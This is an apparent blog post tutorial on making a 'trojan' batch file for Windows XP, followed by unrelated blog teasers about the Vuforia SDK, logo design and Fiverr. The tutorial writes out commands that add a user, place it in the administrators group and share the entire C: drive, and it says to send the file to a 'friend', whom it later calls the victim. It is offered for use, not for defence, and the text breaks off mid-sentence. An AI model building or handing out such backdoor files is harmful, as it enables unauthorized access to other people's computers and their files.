Skip to main content

How To Make a trojan in a .bat file

How To Make a trojan in a .bat file
Open a dos prompt we will only need a dos prompt , and windows xp...


-Bazics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok

Now insert this command: net
And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:

dir
pause

And now save this as test.bat and execute it.
Funny aint it ?

---------------------- Starting -------------------
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.

Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant

Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know wich version of windows xp you are going to try share.

Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend. May 26 Manish Nishad
-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
open 

Comments

Popular posts from this blog

Vuforia SDK : Download instruction, Use of Platform IDE and much more

Vuforia 7 Use the Vuforia SDK to build Android, iOS, and UWP applications for mobile devices and digital eyewear. Apps can be built with Android Studio, Xcode, Visual Studio, and Unity. As of Unity 2017.2, the Vuforia Engine is delivered with the latest version of Unity. A legacy version of the Vuforia Unity Extension is provided to assist with project migrations. Download for Android vuforia-sdk-android-7-2-23.zip (21.27 MB) Download for iOS vuforia-sdk-ios-7-2-23.zip (27.00 MB) Download for UWP vuforia-sdk-uwp-7-2-23.zip (8.90 MB) Download Unity Extension (legacy) vuforia-unity-6-2-10.unitypackage (46.20 MB) Download Unity Vuforia is integrated with the Unity Editor

Logo design

Logo design Learn how to make trendy logos and do freelance work on many sites... It is ALL FREE you dont have to invest in anything.. All you need is time and dont lose hope That was my first online income from 99designs I won a contest with 200 USD for just making a logo design in 8 days..

Fiverr

Fiverr Sell your skills on fiverr and make money with this online platform.   Fiverr is now the world’s largest marketplace for people to make money selling small services (known as ‘gigs’). What you offer could be absolutely anything, from writing and translating, social media poisting, playing pranks and teaching to creating music , voiceovers and short video clips for people all around the world! The default price is $5, but you can attach extra services to gigs for more money. Whilst it might not seem like much, it can quickly add up and there are plenty of examples of people making a really good living from the site. The key is to get a system in place which minimizes the time spent on each gig. But  there is another way to profit even more from Fiverr for potentially far less work. How? By simply reselling gigs elsewhere. For example, find a decent logo designer then reply to jobs on Upwork.com or even local classifieds. A $5 spend can easily beco...